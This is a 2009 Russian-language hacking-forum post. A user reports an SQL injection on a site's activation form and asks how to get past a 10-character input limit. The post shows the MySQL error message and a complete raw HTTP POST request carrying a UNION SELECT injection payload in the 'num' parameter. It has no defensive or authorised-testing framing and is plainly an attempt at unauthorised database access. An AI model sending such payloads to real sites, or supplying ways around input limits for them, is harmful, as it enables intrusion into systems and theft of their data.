31.08.2009, 07:12
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604
Репутация:
19
|
|
подскажите,пожалуйста,нашё л sql-injection,при попытке подбора полей выдаёт ошибку
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'u' AND num_begin < 'nion selec' AND num_end > 'nion selec'' at line 1
Видимо поле для ввода информации ограничено 10-тью символами. Как обойти?
запрос делаю такой:
Код:
POST http://www.host.ru/activation HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/msword, application/vnd.ms-excel, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*
Referer: http://www.host.ru/
Accept-Language: ru
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.host.ru
Content-Length: 14
Proxy-Connection: Keep-Alive
Pragma: no-cache
num='+union+select+1/*
Последний раз редактировалось p.r0phe.t; 31.08.2009 в 07:45..
|
|
|